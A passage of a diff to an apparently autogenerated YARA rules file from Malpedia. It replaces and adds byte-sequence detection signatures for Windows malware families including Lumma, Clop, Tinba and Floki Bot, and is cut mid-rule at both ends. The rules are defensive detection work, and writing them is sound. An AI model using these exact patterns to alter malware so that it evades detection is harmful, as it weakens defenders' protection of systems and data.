+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.infy_auto.yar#L1-L115"
 		license_url = "N/A"
-		logic_hash = "2dbc02d44bc44069a95867e1264648df697162b7220114880dd132223d4a0c26"
+		logic_hash = "351bd4b7525a7ff94f0f3657e8ee347d6c2c31664e11c42093ff09157f2eb43d"
+		score = 60
+		quality = 45
+		tags = "FILE"
+		version = "1"
+		tool = "yara-signator v0.6.0"
+		signator_config = "callsandjumps;datarefs;binvalue"
+		malpedia_rule_date = "20241030"
+		malpedia_hash = "26e26953c49c8efafbf72a38076855d578e0a2e4"
+		malpedia_version = "20241030"
+		malpedia_license = "CC BY-SA 4.0"
+		malpedia_sharing = "TLP:WHITE"
+
+	strings:
+		$sequence_0 = { 8a0d???????? 0f8748020000 84c9 0fb682c0984000 }
+		$sequence_1 = { 7412 50 e8???????? f685b0fdffff10 0f94c0 eb02 33c0 }
+		$sequence_2 = { ff5324 807b2800 7407 8bc3 e8???????? }
+		$sequence_3 = { ff4af8 e8???????? 8b55ec 8d2494 58 5a }
+		$sequence_4 = { 751b 8d45d0 8945f4 8d55f4 }
+		$sequence_5 = { 833d????????00 740e 8d55d0 52 6a01 }
+		$sequence_6 = { 7226 8b35???????? 0fb74b1a 8d91300b0000 39d7 }
+		$sequence_7 = { 85d2 744c 66837af601 7409 50 }
+		$sequence_8 = { 3b45d8 0f8681feffff 5f 5e 5b }
+		$sequence_9 = { 6a00 66837ef602 7418 89cf 89f0 }
+
+	condition:
+		7 of them and filesize < 147456
+}
+rule MALPEDIA_Win_Lumma_Auto : FILE
+{
+	meta:
+		description = "autogenerated rule brought to you by yara-signator"
+		author = "Felix Bilstein - yara-signator at cocacoding dot com"
+		id = "1dee4d5d-9b7b-5ecd-98af-fd03e9ff26e5"
+		date = "2024-10-31"
+		modified = "2024-11-11"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.lumma_auto.yar#L1-L169"
+		license_url = "N/A"
+		logic_hash = "3a8b83c4e573eb9f46c2ea015108cf5619d754c9ccdb93831085f7f3bab02530"
+		score = 75
+		quality = 73
+		tags = "FILE"
+		version = "1"
+		tool = "yara-signator v0.6.0"
+		signator_config = "callsandjumps;datarefs;binvalue"
+		malpedia_rule_date = "20241030"
+		malpedia_hash = "26e26953c49c8efafbf72a38076855d578e0a2e4"
+		malpedia_version = "20241030"
+		malpedia_license = "CC BY-SA 4.0"
+		malpedia_sharing = "TLP:WHITE"
+
+	strings:
+		$sequence_0 = { 53 ff767c ff7678 ff7644 }
+		$sequence_1 = { ff7608 ff7044 ff503c 83c414 }
+		$sequence_2 = { ff7134 ff5130 83c410 85c0 }
+		$sequence_3 = { e8???????? 833800 740a e8???????? 833822 }
+		$sequence_4 = { 894610 8b461c c1e002 50 }
+		$sequence_5 = { ff770c ff37 ff7134 ff5130 }
+		$sequence_6 = { 83c410 85c0 7407 8907 }
+		$sequence_7 = { ff7678 ff7644 ff563c 83c414 }
+		$sequence_8 = { 017e78 83567c00 017e68 83566c00 }
+		$sequence_9 = { 83c40c 6a02 6804010000 e8???????? }
+		$sequence_10 = { 8d8672920300 ff7604 57 50 }
+		$sequence_11 = { ff7034 ff5030 83c410 85c0 }
+		$sequence_12 = { 41 5a cb 55 89e5 }
+		$sequence_13 = { e8???????? 83c40c 017e58 297e5c 03be8c000000 }
+		$sequence_14 = { 59 41 58 5a 59 41 5a }
+		$sequence_15 = { f6460a04 7507 837e3c30 0f92c0 }
+		$sequence_16 = { c70000000000 85c9 7406 c70100000000 c7466cfeffffff b8feffffff 5e }
+		$sequence_17 = { e8???????? 83c40c 019e8c000000 39ef }
+
+	condition:
+		7 of them and filesize < 1115136
+}
+rule MALPEDIA_Win_Meow_Auto : FILE
+{
+	meta:
+		description = "autogenerated rule brought to you by yara-signator"
+		author = "Felix Bilstein - yara-signator at cocacoding dot com"
+		id = "7bfddd3d-be4f-534c-b012-013271dcd1ec"
+		date = "2024-10-31"
+		modified = "2024-11-11"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.meow"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.meow_auto.yar#L1-L133"
+		license_url = "N/A"
+		logic_hash = "3492cd8205784aeb9b05674679a1cd09e5a722fe3928b65cba6a5afbb0a0fecc"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -133974,32 +134493,32 @@ rule MALPEDIA_Win_Upas_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 68???????? ff15???????? 8bf8 85ff 7503 40 }
-		$sequence_1 = { 8d4304 3bc7 0f8496000000 8b450c 397804 0f848a000000 68???????? }
-		$sequence_2 = { 85c0 7441 397d18 740f 53 57 ffd6 }
-		$sequence_3 = { 0f85fd000000 8d45fc 50 57 57 6a03 }
-		$sequence_4 = { 68???????? ff7508 ffd7 ff7508 8b1d???????? ffd3 8d45fc }
-		$sequence_5 = { 8b4508 8b403c 5d c3 8b4508 8b4008 }
-		$sequence_6 = { 7507 0bcf 83fe03 7317 83fa04 7512 }
-		$sequence_7 = { 55 8bec 8b450c 48 7413 48 7410 }
-		$sequence_8 = { ff75fc 83e905 ff75ec c600e9 }
-		$sequence_9 = { 897dfc e8???????? 59 8bc8 8945ec }
+		$sequence_0 = { c645c14c c645c24b c645c36d c645c44b c645c572 c645c64b c645c74b }
+		$sequence_1 = { c68525fdffff41 c68526fdffff41 8a85fdfcffff 389dfcfcffff 7539 33ff 8d777f }
+		$sequence_2 = { c685d9f8ffff71 c685daf8ffff11 c685dbf8ffff6a c685dcf8ffff11 c685ddf8ffff11 c685def8ffff11 8a85d1f8ffff }
+		$sequence_3 = { c68570fcffff05 c68571fcffff0a c68572fcffff05 c68573fcffff27 c68574fcffff05 c68575fcffff05 c68576fcffff05 }
+		$sequence_4 = { 7209 8b4210 03c6 3bf8 720b 41 663bcb }
+		$sequence_5 = { c6858afbffff4d c6858bfbffff2f c6858cfbffff4d c6858dfbffff2b c6858efbffff4d c6858ffbffff43 c68590fbffff4d }
+		$sequence_6 = { 83c001 0f852e010000 8b442410 40 89442410 8b442410 2503000080 }
+		$sequence_7 = { 00942103007e21 0300 6a21 0300 5c 2103 005021 }
+		$sequence_8 = { c685b1fcffff56 c685b2fcffff56 8a85a9fcffff e8???????? 8985e8f5ffff 8d8d9cfcffff c6859cfcffff00 }
+		$sequence_9 = { 0f845489ffff e9???????? e9???????? 55 8bec ff7508 }
 
 	condition:
-		7 of them and filesize < 114688
+		7 of them and filesize < 492544
 }
-rule MALPEDIA_Win_Rtpos_Auto : FILE
+rule MALPEDIA_Win_Mapiget_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "959dc55e-8b27-5e8d-9c83-fdb4eeace02c"
+		id = "b7a42e52-aa49-5fa2-9228-6b144ce76bdc"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rtpos"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.rtpos_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mapiget"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mapiget_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "e4e59ac435d46c5a64df569379669b4dd97e2cfaff34fac6f768e0380b69204e"
+		logic_hash = "9a5d011e54dd8be32162fd28789dfb313e466b4c449ca547e52393f68f4438eb"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -134013,71 +134532,110 @@ rule MALPEDIA_Win_Rtpos_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 83c408 c745fcffffffff 8d4dc0 e8???????? }
-		$sequence_1 = { 50 8d8df4fdffff 51 8b95f0fdffff 8b421c 50 e8???????? }
-		$sequence_2 = { 6a01 6a00 6a01 6a04 8d8de8fdffff }
-		$sequence_3 = { 894dbc 8b55bc 0fb602 50 }
-		$sequence_4 = { 8b4508 56 be???????? c745ecfcad4200 }
-		$sequence_5 = { 8bec 83ec44 894dfc c745d800000000 682c020000 6a00 }
-		$sequence_6 = { 6bf830 894df8 6a0a 8b048db86a4300 5b 8b543818 8955ec }
-		$sequence_7 = { 8985ecfdffff 6808020000 6a00 8d85f4fdffff 50 e8???????? 83c40c }
-		$sequence_8 = { 8bec 51 894dfc 0fbe4508 83f830 7c12 0fbe4d08 }
-		$sequence_9 = { c745a000000000 e9???????? 8b4508 83c001 894508 8b4d0c }
+		$sequence_0 = { f3ab 8b750c b900010000 8dbdf0f9ffff 8965f0 f3ab b980000000 }
+		$sequence_1 = { 8dbdf0feffff f3ab 8b750c b900010000 }
+		$sequence_2 = { 0108 c20400 8bc1 c700???????? c20400 }
+		$sequence_3 = { 6a40 50 e8???????? 83c40c 85c0 0f84f8010000 }
+		$sequence_4 = { 6689bc45eef9ffff 8d95f0fdffff 8d85f0f9ffff 52 50 e8???????? 83c408 }
+		$sequence_5 = { 83cdff 56 83fb02 57 }
+		$sequence_6 = { 8d8c2430020000 53 51 e8???????? }
+		$sequence_7 = { 81ec20040000 53 57 33db b97f000000 33c0 8d7c242a }
+		$sequence_8 = { c706???????? 8b4624 8365fc00 85c0 7612 fe88e0134100 }
+		$sequence_9 = { c3 660dffff c3 56 8bf1 e8???????? }
 
 	condition:
-		7 of them and filesize < 507904
+		7 of them and filesize < 163840
 }
-rule MALPEDIA_Win_Onliner_Auto : FILE
+rule MALPEDIA_Win_Http_Troy_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c0a25174-badc-5a1b-a67c-48cbb1aef2be"
-		date = "2023-12-06"
-		modified = "2023-12-08"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.onliner"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.onliner_auto.yar#L1-L132"
+		id = "ce73b438-aadd-590a-8f29-6294af71df05"
+		date = "2024-10-31"
+		modified = "2024-11-11"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.http_troy"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.http_troy_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "6df36365f1b8dbe7cdb1d0b03d64f7da847c99d2518d7b5ebc1610f68ca3a069"
+		logic_hash = "0940e5bc37e1b157bd6ecfd92ed3054d2dd55689c30354c0593d0b04427adfc7"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
 		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20231130"
-		malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351"
-		malpedia_version = "20230808"
+		malpedia_rule_date = "20241030"
+		malpedia_hash = "26e26953c49c8efafbf72a38076855d578e0a2e4"
+		malpedia_version = "20241030"
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0f8274ffffff 6683ff04 0f8596000000 33ff 8d45e4 668b55ee c1e202 }
-		$sequence_1 = { 8d8db4feffff 8bd3 8bc6 8b38 ff570c 8b85b4feffff 5a }
-		$sequence_2 = { 85c0 7405 3b50fc 7205 e8???????? 42 8d4410ff }
-		$sequence_3 = { 50 6a00 8bc3 e8???????? 50 ff15???????? }
-		$sequence_4 = { 3b45e4 0f84ab000000 ff45e4 807dee00 742c 8b55e4 2bd0 }
-		$sequence_5 = { 3345fc 03c6 0345cc 05c8fbd3e7 ba14000000 e8???????? 03c7 }
-		$sequence_6 = { 8bda 8bf0 8bc3 ba02000000 e8???????? 8bc3 e8???????? }
-		$sequence_7 = { 33c0 8945ec 837df000 7426 83caff 8b45f8 }
-		$sequence_8 = { 3bc3 7c07 807c1eff20 74f4 57 b9ffffff7f 8bd3 }
-		$sequence_9 = { 8b45fc 8b88d0010000 ba02000000 8b45fc 8b18 ff534c ff75e4 }
+		$sequence_0 = { 53 56 57 89842434010000 33c0 c644242800 b940000000 }
+		$sequence_1 = { f6c405 7a17 83f901 7508 dd05???????? eb02 d9ee }
+		$sequence_2 = { 8b18 56 8b750c 3bf7 0f84b9000000 807e0800 0f84af000000 }
+		$sequence_3 = { 75f6 8d842458010000 8d5001 8a08 40 3acb 75f9 }
+		$sequence_4 = { 03c2 894518 8b4514 85c0 c7457c00000000 894d70 0f8568010000 }
+		$sequence_5 = { f644244c01 66897c244e 7505 8064244cf7 668b4c244c 8b54247c 2b5510 }
+		$sequence_6 = { 85c0 740f 33c0 8b4c2414 e8???????? 83c418 c3 }
+		$sequence_7 = { 8d45ac 50 8d8d6cffffff 51 68???????? 8b5508 52 }
+		$sequence_8 = { 5d c3 56 ff15???????? 8b442414 50 ff15???????? }
+		$sequence_9 = { 83e103 68???????? f3a4 e8???????? 83c404 8d942488000000 8d9b00000000 }
 
 	condition:
-		7 of them and filesize < 1736704
+		7 of them and filesize < 475136
 }
-rule MALPEDIA_Win_Tmanger_Auto : FILE
+rule MALPEDIA_Win_Portdoor_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "90de765e-dcad-555e-a3e2-21f3e814ffeb"
+		id = "f90b2eef-c6a0-58b2-8785-46346ca37f1b"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tmanger"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.tmanger_auto.yar#L1-L115"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.portdoor"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.portdoor_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "a7986e1f1ff68dbdf6cb715e7bd380c31c6c5e7bcad1efb5e3857ab5edff19ad"
+		logic_hash = "979d5d744cc74395bacd5f81861791359824c98484ee261c7c39edba432e34ef"
+		score = 75
+		quality = 73
+		tags = "FILE"
+		version = "1"
+		tool = "yara-signator v0.6.0"
+		signator_config = "callsandjumps;datarefs;binvalue"
+		malpedia_rule_date = "20241030"
+		malpedia_hash = "26e26953c49c8efafbf72a38076855d578e0a2e4"
+		malpedia_version = "20241030"
+		malpedia_license = "CC BY-SA 4.0"
+		malpedia_sharing = "TLP:WHITE"
+
+	strings:
+		$sequence_0 = { 6a73 5b 6a3b 59 6a64 }
+		$sequence_1 = { 6a08 8bf1 e8???????? 8bf8 56 }
+		$sequence_2 = { ddd8 db2d???????? b801000000 833d????????00 0f8586480000 ba05000000 }
+		$sequence_3 = { 890497 42 eb1d 84ff 7405 c60000 46 }
+		$sequence_4 = { b001 eb0f 68???????? 56 e8???????? 59 59 }
+		$sequence_5 = { ff15???????? 6a02 89459c 58 ff750c 66894598 ff15???????? }
+		$sequence_6 = { 8d85fcf3ffff 57 53 50 e8???????? }
+		$sequence_7 = { e8???????? eb85 8b3d???????? 8bcf 8b1d???????? e8???????? }
+		$sequence_8 = { 83c40c 8d1406 3bcb 773f 8b7704 }
+		$sequence_9 = { eb41 8b4dec e8???????? 8945f0 eb34 8b4dec }
+
+	condition:
+		7 of them and filesize < 297984
+}
+rule MALPEDIA_Win_Tinba_Auto : FILE
+{
+	meta:
+		description = "autogenerated rule brought to you by yara-signator"
+		author = "Felix Bilstein - yara-signator at cocacoding dot com"
+		id = "8dfb27e2-54cb-58f0-8a40-15de14b5671d"
+		date = "2024-10-31"
+		modified = "2024-11-11"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinba"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.tinba_auto.yar#L1-L138"
+		license_url = "N/A"
+		logic_hash = "12776db9a2ca5e4e1bee242492b810213115a7f9fd4fce223ca3d2d59532f5e7"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -134091,32 +134649,35 @@ rule MALPEDIA_Win_Tmanger_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c74118d95dc845 c7411cf8f0564e c7412066b8276e c7412425d933d1 c7412861fdc72a c7412cdf9134d2 }
-		$sequence_1 = { c741651f013f62 c74169388b8e92 c7416d9b14f6a0 c7417180fcd6bb }
-		$sequence_2 = { c74169388b8e92 c7416d9b14f6a0 c7417180fcd6bb c74175d7401d36 c7417958fffa19 }
-		$sequence_3 = { c7410491b20524 c74108cc6188ff c7410c16d9fdf8 c741103a71c135 }
-		$sequence_4 = { c7411cf8f0564e c7412066b8276e c7412425d933d1 c7412861fdc72a c7412cdf9134d2 c74130324d251d c74134375ec19d }
-		$sequence_5 = { c741651f013f62 c74169388b8e92 c7416d9b14f6a0 c7417180fcd6bb c74175d7401d36 c7417958fffa19 }
-		$sequence_6 = { c74169388b8e92 c7416d9b14f6a0 c7417180fcd6bb c74175d7401d36 }
-		$sequence_7 = { c74114c2a02ab0 c74118d95dc845 c7411cf8f0564e c7412066b8276e }
-		$sequence_8 = { c741103a71c135 c74114c2a02ab0 c74118d95dc845 c7411cf8f0564e c7412066b8276e c7412425d933d1 c7412861fdc72a }
-		$sequence_9 = { c7412066b8276e c7412425d933d1 c7412861fdc72a c7412cdf9134d2 }
+		$sequence_0 = { 8b7508 ad 50 56 }
+		$sequence_1 = { 8b4510 aa 8b450c ab }
+		$sequence_2 = { 6a00 6a00 ff750c 6a00 6a00 ff7508 }
+		$sequence_3 = { 8a241f 88240f 88041f 41 }
+		$sequence_4 = { 0f84f2000000 49 89cf 49 }
+		$sequence_5 = { 8b4004 8b08 8b450c 8908 }
+		$sequence_6 = { 7506 8b4108 8b4014 85c0 7403 }
+		$sequence_7 = { b8436f6f6b ab b869653a20 ab 037df8 4f }
+		$sequence_8 = { 48 89ce 49 89c8 31c9 }
+		$sequence_9 = { 85c0 7403 b073 aa b83a2f2f00 ab 4f }
+		$sequence_10 = { 83ef0e 85c0 741b 66b80d0a 66ab }
+		$sequence_11 = { c22c00 55 89e5 53 e8???????? }
+		$sequence_12 = { 66894208 66894a0a ac 88c1 80e1fe 80f9c4 }
 
 	condition:
-		7 of them and filesize < 8252416
+		7 of them and filesize < 57344
 }
-rule MALPEDIA_Win_Scanpos_Auto : FILE
+rule MALPEDIA_Win_Sanny_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "68b120db-1dba-5584-bc59-126fea6e111e"
+		id = "71ee291c-39d8-5317-9103-639480e4514a"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.scanpos"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.scanpos_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sanny"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.sanny_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "a62211e1eb96c58c9bf699a15d117ca283e56d459f8aea50975f3891740e6968"
+		logic_hash = "ae770490b83cd065ad50cf06c242577c788775793cde0b9ec9f8ad204369466f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -134130,32 +134691,32 @@ rule MALPEDIA_Win_Scanpos_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 83c404 84db 0f85c1010000 8d75d4 b8???????? }
-		$sequence_1 = { 754b 8b74183c 3bf7 7443 8b16 }
-		$sequence_2 = { 40 84c9 75f9 2bc2 8bf8 8d759c }
-		$sequence_3 = { b8???????? e8???????? 83781000 bf10000000 0f94c3 397de8 720c }
-		$sequence_4 = { 0f85ef000000 b208 8d642400 0fbec2 8a0c38 03c7 80f939 }
-		$sequence_5 = { 8975f0 c74431b0a4414100 8d4eb4 c745fc00000000 e8???????? }
-		$sequence_6 = { 8b74183c 3bf7 7443 8b16 8b4204 f644300c06 7517 }
-		$sequence_7 = { 68???????? 8d4df4 51 c745f430124100 }
-		$sequence_8 = { ff15???????? 8b7508 c7465c682a4100 83660800 33ff }
-		$sequence_9 = { 83c004 57 e8???????? a1???????? 50 }
+		$sequence_0 = { e8???????? 85c0 7514 50 50 6a7f }
+		$sequence_1 = { a1???????? dd45f4 5b dd5810 a1???????? }
+		$sequence_2 = { 33f5 33fd 8bce 8bc6 c1e904 c1e01c 03c8 }
+		$sequence_3 = { 68???????? 52 e8???????? 83c408 c60000 8d84244c010000 8d8c2414020000 }
+		$sequence_4 = { 8bc8 c1e91d 8d0cc1 8b4204 8bd0 c1ea1d 8d2cc2 }
+		$sequence_5 = { 83c002 50 8d842488000000 50 ffd3 8d8c2484000000 68???????? }
+		$sequence_6 = { 8b4c2410 50 51 52 8bce c644241000 e8???????? }
+		$sequence_7 = { 81c72c010000 3bf5 7cde 8d942414020000 8d842414040000 52 68???????? }
+		$sequence_8 = { 83e01f 8b0c8dc0864100 8d04c1 eb05 b8???????? f6400480 }
+		$sequence_9 = { 890d???????? 8b0d???????? 68???????? a3???????? 68???????? 8d420c }
 
 	condition:
-		7 of them and filesize < 229376
+		7 of them and filesize < 253952
 }
-rule MALPEDIA_Win_Bughatch_Auto : FILE
+rule MALPEDIA_Win_Clop_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7c76d5fd-0852-57e8-98d3-2429c0a26bc6"
+		id = "d1ccc182-0c15-5d56-97cc-8d7a704e7207"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bughatch"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.bughatch_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.clop"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.clop_auto.yar#L1-L193"
 		license_url = "N/A"
-		logic_hash = "ce23ebcae0b6af11021010314345b92d6fc792734955c495c1529b11609de8c0"
+		logic_hash = "3750789377624c88727401f0639208a90e22f423fdcc34c5c702f455dce2beef"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -134169,32 +134730,42 @@ rule MALPEDIA_Win_Bughatch_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c745f800000000 c745fc00000000 6a00 8b4510 50 8d4dfc }
-		$sequence_1 = { 6a00 6a12 6a01 e8???????? 83c410 85c0 7528 }
-		$sequence_2 = { 51 6a00 6a01 8b5514 52 }
-		$sequence_3 = { 8b4ddc 51 8b5510 52 8b450c 50 e8???????? }
-		$sequence_4 = { e8???????? 83c408 eb20 8b45f4 50 e8???????? }
-		$sequence_5 = { 8b45fc 8b4df8 3b4818 7365 8b55f8 }
-		$sequence_6 = { 50 8d8decfeffff 51 68???????? 8d95e8fdffff 52 ff15???????? }
-		$sequence_7 = { 894a04 eb09 c745f400000000 eb02 eba0 }
-		$sequence_8 = { 8bec 83ec18 c745fc00000000 c745f800000000 8d45fc 50 6a28 }
-		$sequence_9 = { ff15???????? 8b55f8 0355f4 8955f8 b801000000 6bc800 }
+		$sequence_0 = { 83c40c 6860070000 6a40 ff15???????? }
+		$sequence_1 = { 6a04 6800300000 6887000000 6a00 }
+		$sequence_2 = { 53 ff15???????? 50 ff15???????? 56 53 8bf8 }
+		$sequence_3 = { 6a00 ff15???????? 68???????? 8bd8 }
+		$sequence_4 = { 8bf8 ff15???????? 8bf0 56 6a40 }
+		$sequence_5 = { 75be ddd8 db2d???????? b802000000 833d????????00 0f85f0080000 }
+		$sequence_6 = { 0f842e0c0000 83ec08 0fae5c2404 8b442404 }
+		$sequence_7 = { 50 ff15???????? 83c40c 6860070000 }
+		$sequence_8 = { 8d85bcefffff 50 ff15???????? 68???????? }
+		$sequence_9 = { 68???????? 68???????? e8???????? 83c424 6aff }
+		$sequence_10 = { 68???????? 50 ffd3 8d85d4f7ffff 50 }
+		$sequence_11 = { ffd0 c3 8bff 55 8bec 83ec1c 8d4de4 }
+		$sequence_12 = { e8???????? 8be5 5d c20400 56 ff15???????? 6a00 }
+		$sequence_13 = { 0f85aa010000 68???????? 8d442450 50 }
+		$sequence_14 = { ff15???????? 68???????? 8d85dcf7ffff 50 }
+		$sequence_15 = { 6a00 6a00 e8???????? 83c408 6aff ff15???????? 33c0 }
+		$sequence_16 = { 6aff ffd7 8b4dfc 33c0 5f }
+		$sequence_17 = { 83c40c 33f6 85ff 7428 }
+		$sequence_18 = { 83c424 53 50 ffd6 }
+		$sequence_19 = { 6a00 56 ffd7 8b35???????? 6800800000 }
 
 	condition:
-		7 of them and filesize < 75776
+		7 of them and filesize < 796672
 }
-rule MALPEDIA_Win_Mirage_Auto : FILE
+rule MALPEDIA_Win_Floki_Bot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f68fe58b-43a1-51bc-9791-76dd178418d5"
+		id = "25c81d04-9abf-5940-8e55-7e5abeb99153"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mirage"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mirage_auto.yar#L1-L168"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.floki_bot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.floki_bot_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "4d8628bd678dab095b081b63d7dce2fda51131fe49ad45959de9c07d1338533f"
+		logic_hash = "e2f9df61c4df036b71f6882cf4c35419384506db07aa4de7d79fcad14d6710ad"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -134208,38 +134779,32 @@ rule MALPEDIA_Win_Mirage_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c745f804010000 ff75fc ff15???????? ff75fc }
-		$sequence_1 = { 59 3bc3 59 7412 83c005 50 8d85ecfeffff }
-		$sequence_2 = { 83c428 8935???????? b001 5f 5e 5b }
-		$sequence_3 = { 8d45f4 50 53 68???????? c745f804010000 ff75fc }
-		$sequence_4 = { be14410000 8d85d4beffff 56 53 50 e8???????? }
-		$sequence_5 = { 7407 68f4010000 eb06 ff35???????? ff15???????? }
-		$sequence_6 = { e8???????? 83c41c 8935???????? 8ac3 }
-		$sequence_7 = { ff75fc ff15???????? 8b8514010000 2b7df4 8985e0bfffff 8d450d }
-		$sequence_8 = { 8d8520010000 56 50 e8???????? 8b4510 }
-		$sequence_9 = { 6801000080 ff15???????? 85c0 7556 }
-		$sequence_10 = { 889590fcffff 33db f3ab 66ab 8d8d90feffff 895dfc }
-		$sequence_11 = { 755d 8b06 385d08 8b08 }
-		$sequence_12 = { 83c414 8d8530fbffff 53 50 e8???????? 59 50 }
-		$sequence_13 = { 50 ff15???????? 8d4d9c 885dfc e8???????? }
-		$sequence_14 = { 894518 e8???????? 8bf8 59 85ff 7504 33c0 }
-		$sequence_15 = { 7405 83f847 7517 8d860c010000 }
+		$sequence_0 = { fe45ff 8a45ff 3a45fc 7285 fe45fe 8a45fe 3a4601 }
+		$sequence_1 = { 8bc6 8d74241c e8???????? 84c0 0f843f010000 8b442414 }
+		$sequence_2 = { 53 57 8bf8 8d45f8 50 33db }
+		$sequence_3 = { 8b4c2414 0fb713 83fa04 7516 663911 7507 8b4d10 }
+		$sequence_4 = { 50 53 ff35???????? 682d010000 e8???????? 83c418 }
+		$sequence_5 = { 50 e8???????? ff471c 015f14 8bc6 8b55fc e8???????? }
+		$sequence_6 = { bf???????? e8???????? ff75f0 84c0 7407 e8???????? eb08 }
+		$sequence_7 = { 8d45f4 50 e8???????? 6a09 6a00 8d45f4 50 }
+		$sequence_8 = { 744d 66391f 7448 8d4c2440 e8???????? 6a04 8d544444 }
+		$sequence_9 = { 84c0 744b 8b45f8 85c0 7414 ff75ec e8???????? }
 
 	condition:
-		7 of them and filesize < 1695744
+		7 of them and filesize < 286720
 }
-rule MALPEDIA_Win_Zitmo_Auto : FILE
+rule MALPEDIA_Win_Varenyky_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d2638537-3a4e-5c8e-ade0-4e7713d00050"
+		id = "ab8f8dd3-9c68-536a-86ec-5c7d9a6bae52"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zitmo"
